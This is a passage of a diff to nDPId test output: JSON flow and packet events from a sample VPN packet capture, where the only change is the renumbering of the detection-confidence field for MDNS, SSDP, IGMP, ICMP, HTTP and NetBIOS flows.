-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} +00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1569687286918,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687286918,"pkt":"AQBeAAD7pHczjPFACABFAABpAABAAP8Rj\/MKAACV4AAA+xTpFOkAVS3HAAAAAAABAAAAAAAAJDc5ZDg4ZTgzLTcyNWMtYjcxYi1iYWQwLTU4NjJkNWIyMjM4NgtfZ29vZ2xlem9uZQRfdGNwBWxvY2FsAAAhAAE="} -00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"79d88e83-725c-b71b-bad0-5862d5b22386._googlezone._tcp.local"}} +00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"79d88e83-725c-b71b-bad0-5862d5b22386._googlezone._tcp.local"}} 00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1569687286918,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1569687286918,"pkt":"AQBeAAD7pHczjPFACABFAAD+AABAAP8Rj14KAACV4AAA+xTpFOkA6vJcAACEAAAAAAEAAAADC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQAAAHgAJyQ3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODbADMAuABCAAQAAEZQAOCNpZD0yMERGOEZENkYzMTU5MUQyMDUwNEE5RkQ5OThDMzlFRRNfX2NvbW1vbl90aW1lX189MXwwwC4AIYABAAAAeAAtANIA8ycRJDc5ZDg4ZTgzLTcyNWMtYjcxYi1iYWQwLTU4NjJkNWIyMjM4NsAdwKsAAYABAAAAeAAECgAAlQ=="} -00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} +00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1569687287737,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":16,"thread_ts_msec":1569687287737,"pkt":"AQBeAAABLH6BsEqhCABFwAAkGHoAAAEBtp0KAAAB4AAAAQkA5rYBAgVGCgAAAQAAAAAAAP\/\/Aiw="} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} -00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} +00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247192,"flow_last_seen":1569687259297,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 